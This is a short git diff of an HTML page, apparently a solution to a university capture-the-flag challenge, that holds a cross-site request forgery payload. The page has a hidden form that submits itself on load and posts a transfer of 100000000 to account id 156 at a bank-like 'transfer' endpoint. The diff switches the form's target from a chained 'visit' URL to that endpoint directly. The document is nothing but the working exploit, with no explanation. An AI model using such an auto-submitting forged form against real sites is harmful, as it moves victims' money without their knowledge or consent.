--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
     <title>bank_form</title>
   </head>
   <body onload="document.bank_form.submit()">
-    <form action="http://cs2107-ctfd-i.comp.nus.edu:5004/visit?url=https://runoutofit.github.io/form/visit?url=http://svb:5003/transfer/1" method="POST" name="bank_form" style="display: none;">
+    <form action="http://svb:5003/transfer/1" method="POST" name="bank_form" style="display: none;">
       <input type="text" name="amount" value="100000000" />
       <input type="text" name="id" value="156" />
     </form>
